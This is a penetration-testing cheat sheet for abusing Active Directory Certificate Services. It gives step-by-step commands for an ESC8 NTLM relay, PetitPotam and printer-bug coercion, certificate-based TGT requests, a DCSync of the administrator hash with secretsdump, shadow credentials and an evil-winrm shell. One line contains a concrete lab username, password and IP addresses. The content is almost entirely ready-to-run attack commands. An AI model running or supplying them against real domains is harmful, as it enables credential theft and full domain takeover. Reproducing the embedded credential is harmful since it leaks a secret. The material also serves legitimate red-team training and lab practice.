Abuse Active Directory Certificate Services (ADCS) to obtain certificates that can be used for authentication
Most common: ESC8 (NTLM relay to ADCS web enrollment)
ESC8 - NTLM Relay to ADCS Web Enrollment
# Template depends on target - DomainController for DCs, KerberosAuthentication for others
ntlmrelayx.py -debug -smb2support --target http://< CA_HOST> /certsrv/certfnsh.asp --adcs --template DomainController
# PetitPotam (MS-EFSRPC) - often works unauthenticated
python3 PetitPotam.py < attacker_ip> < dc_ip>
# Printer Bug (MS-RPRN) - requires valid creds
python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:" package5shores_topher1" @10.129.234.109 10.10.16.12
Obtain TGT from Certificate
python3 gettgtpkinit.py < DOMAIN> /< DC$> -cert-pfx < cert.pfx> -dc-ip < dc_ip> dc.ccache
DCSync with Machine Account TGT
export KRB5CCNAME=dc.ccache
secretsdump.py -just-dc-user < DOMAIN> /administrator -k -no-pass < DC_FQDN>
Alternative: Get NT Hash Directly from TGT
python3 getnthash.py -key < as_rep_key> < DOMAIN> /< DC$>
Certipy (All-in-One Alternative)
certipy auth -pfx < cert.pfx> -dc-ip < dc_ip> -domain < DOMAIN>
# If PKINIT fails (DC doesn't support it), fall back to ldap-shell
certipy auth -pfx < cert.pfx> -dc-ip < dc_ip> -ldap-shell
Windows: Rubeus with Certificate
.\Rubeus.exe asktgt / user:< DC$> / certificate:< base64_cert> / ptt
Shadow Credentials (msDS-KeyCredentialLink)
Add Shadow Credential (Linux)
pywhisker --dc-ip < dc_ip> -d < DOMAIN> -u < user> -p ' <pass>' --target < target_user> --action add
Obtain TGT from Shadow Credential PFX
python3 gettgtpkinit.py -cert-pfx < cert.pfx> -pfx-pass ' <password>' -dc-ip < dc_ip> < DOMAIN> /< target_user> /tmp/target.ccache
export KRB5CCNAME=/tmp/target.ccache
evil-winrm -i < dc_fqdn> -r < domain>